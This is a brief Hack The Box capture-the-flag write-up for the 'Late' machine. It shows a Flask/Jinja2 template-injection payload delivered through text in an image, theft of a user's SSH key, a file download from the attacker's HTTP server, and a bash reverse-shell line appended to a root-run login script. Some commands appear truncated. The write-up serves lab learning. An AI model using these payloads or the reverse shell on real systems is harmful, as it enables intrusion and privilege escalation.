Late HTB writeup
User flag
Normal nmap and fuzzing nothing really appears
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
I started inspecting the page and found a virtual host images.late.htb so I added it to /etc/hosts to inspects it too. The trick here is that the back-end uses flask (as the web page shows) so I created an image with text in gimp that said {{5*5}} and the text file returned 25 so now we have RCE. I searched for flask RCE commands on the web and found this.
So I created various payloads with
{ { self._TemplateReference__context.cycler.__init__.__globals__.os.popen('command').read() } }
I found out with whoami I was the user named svc_acc. I looked around his home and got his ssh key into my machine obtaining the user flag.
Root flag
Once in the machine I downloaded from my machine with
[kali@kali ~]$ python3 -m http.server 7777
svc_acc@late:/tmp$ wget
chmod a+x > result
less -r result
while reading the results the $PATH appears in orange multiple times so I visited the /usr/local/sbin and saw the file As the code and the name of the file indicates it seems it gets executed by root every time someone logs by ssh so I concatenated a reverse shell bash shell and connected again gaining access to root.
bash -i >& /dev/tcp/ 0>&1